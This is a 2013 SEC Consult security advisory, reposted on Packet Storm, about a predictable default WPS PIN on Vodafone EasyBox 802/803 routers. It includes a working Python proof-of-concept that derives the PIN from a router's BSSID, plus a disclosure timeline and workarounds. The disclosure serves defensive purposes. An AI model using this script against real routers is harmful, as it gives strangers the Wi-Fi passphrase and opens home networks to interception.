what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Vodafone EasyBox Default WPS PIN Algorithm Weakness

Vodafone EasyBox Default WPS PIN Algorithm Weakness
Posted Aug 6, 2013
Authored by S. Viehbock | Site sec-consult.com

Vodafone EasyBox versions 802 and 803 suffer from a default WPS PIN algorithm weakness. The algorithm that generates the default WPS-PIN is entirely based on the MAC address (=BSSID) and serial number of the device. The serial number can be derived from the MAC address.

tags | exploit
SHA-256 | 289f3c58cfede8c1346e1a846dc8ad72e079b2ff4985c9f67e119e67dffb4df5

Vodafone EasyBox Default WPS PIN Algorithm Weakness

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20130805-0 >
=======================================================================
title: Vodafone EasyBox Default WPS PIN Algorithm Weakness
product: EasyBox 802 & EasyBox 803
vulnerable version: EasyBox 802 - all versions
EasyBox 803 - Production date before August 2011
fixed version: EasyBox 802 - no vendor patch available
EasyBox 803 - Production date after August 2011
impact: Critical
homepage: http://www.vodafone.de
found: 2012-12-01
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================

Vendor/product description:
-----------------------------
These DSL home gateways are manufactured by Arcadyan/Astoria Networks and are
rebranded for Vodafone Germany. A Wi-Fi AP is enabled by default and can be
accessed with the default WPS PIN (PIN External Registrar) printed on the back
of the device.


Vulnerability overview/description:
-----------------------------------
The algorithm that generates the default WPS-PIN is entirely based on the MAC
address (=BSSID) and serial number of the device. The serial number can be
derived from the MAC address.

An unauthenticated attacker within the range of the access point can capture
the BSSID (eg. from 802.11 Beacon Frames) and calculate the default WPS PIN
for it. This PIN can then be used to retrieve the current access point
configuration (including the WPA passphrase) or to change the configuration
(SSID, encryption method, passphrase, ...) of the access point.

An attacker can afterwards connect to the access point and perform malicious
activities such as Man-in-the-middle attacks using ARP spoofing, attack clients
on the internal network, etc.


Proof of concept:
-----------------
A script that implements the derivation algorithm has been developed:

#!/usr/bin/env python
import sys, re

def gen_pin (mac_str, sn):
mac_int = [int(x, 16) for x in mac_str]
sn_int = [0]*5+[int(x) for x in sn[5:]]
hpin = [0] * 7

k1 = (sn_int[6] + sn_int[7] + mac_int[10] + mac_int[11]) & 0xF
k2 = (sn_int[8] + sn_int[9] + mac_int[8] + mac_int[9]) & 0xF
hpin[0] = k1 ^ sn_int[9];
hpin[1] = k1 ^ sn_int[8];
hpin[2] = k2 ^ mac_int[9];
hpin[3] = k2 ^ mac_int[10];
hpin[4] = mac_int[10] ^ sn_int[9];
hpin[5] = mac_int[11] ^ sn_int[8];
hpin[6] = k1 ^ sn_int[7];
pin = int('%1X%1X%1X%1X%1X%1X%1X' % (hpin[0], hpin[1], hpin[2], hpin[3], hpin[4], hpin[5],
hpin[6]), 16) % 10000000

# WPS PIN Checksum - for more information see hostapd/wpa_supplicant source (wps_pin_checksum) or
# http://download.microsoft.com/download/a/f/7/af7777e5-7dcd-4800-8a0a-b18336565f5b/WCN-Netspec.doc
accum = 0
t = pin
while (t):
accum += 3 * (t % 10)
t /= 10
accum += t % 10
t /= 10
return '%i%i' % (pin, (10 - accum % 10) % 10)

def main():
if len(sys.argv) != 2:
sys.exit('usage: easybox_wps.py [BSSID]\n eg. easybox_wps.py 38:22:9D:11:22:33\n')

mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
if len(mac_str) != 12:
sys.exit('check MAC format!\n')

sn = 'R----%05i' % int(mac_str[8:12], 16)
print 'derived serial number:', sn
print 'SSID: Arcor|EasyBox|Vodafone-%c%c%c%c%c%c' % (mac_str[6], mac_str[7], mac_str[8],
mac_str[9], sn[5], sn[9])
print 'WPS pin:', gen_pin(mac_str, sn)

if __name__ == "__main__":
main()


Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in EasyBox 802 and EasyBox 803,
both produced by Arcadyan/Astoria Networks. Other devices of this vendor
(including EasyBox 903) might be affected as well. Vodafone did not provide
any information on this.

According to Vodafone / CERT-Bund, the following devices are vulnerable:
EasyBox 802 - all versions
EasyBox 803 - production date before August 2011


Vendor contact timeline:
------------------------
2012-12-14: Contacting Vodafone via customer support.
2013-01-09: Vodafone refers to datenschutz@vodafone.com.
2013-01-10: Requesting encryption keys.
2013-01-14: Vodafone provides encryption keys.
2013-01-15: Sending advisory and proof of concept exploit via encrypted
channel.
2013-01-25: Sending reminder regarding SEC Consult disclosure policy.
2013-01-25: Automatic response: Out of office until 2013-02-24.
2013-01-25: Requesting new contact person from CSIRT-DE@vodafone.com
and DU-DE-ZV-MXL-CSIRT-DE@vodafone.com.
2013-01-28: Vodafone acknowledges receipt of advisory.
2013-02-05: Vodafone confirms validity of provided information, gives
information about some newer devices which are not affected,
mentions that customers have already been notified to change
"default passwords" (no details given).
2013-02-21: Requesting information regarding affected products/product versions,
clarification regarding "default passwords", URLs/communication
channels used for mentioned notifications, ways for identifying
vulnerable devices (end users), ...
2013-03-13: Still no response - sending deadline dates
2013-05-29: Contacting German CERT-Bund for further coordination in order to
warn end users
2013-08-05: Coordinated release of advisory with German CERT-Bund


Solution:
---------
Vodafone does not provide a solution for the affected devices.


Workaround:
-----------
Either change the WPS PIN or disable WPS entirely.
SEC Consult could not confirm if WPS actually is disabled (as opposed to just
not being advertised), so both changing the PIN and disabling WPS is
recommended.


Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Stefan Viehböck / @2013
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close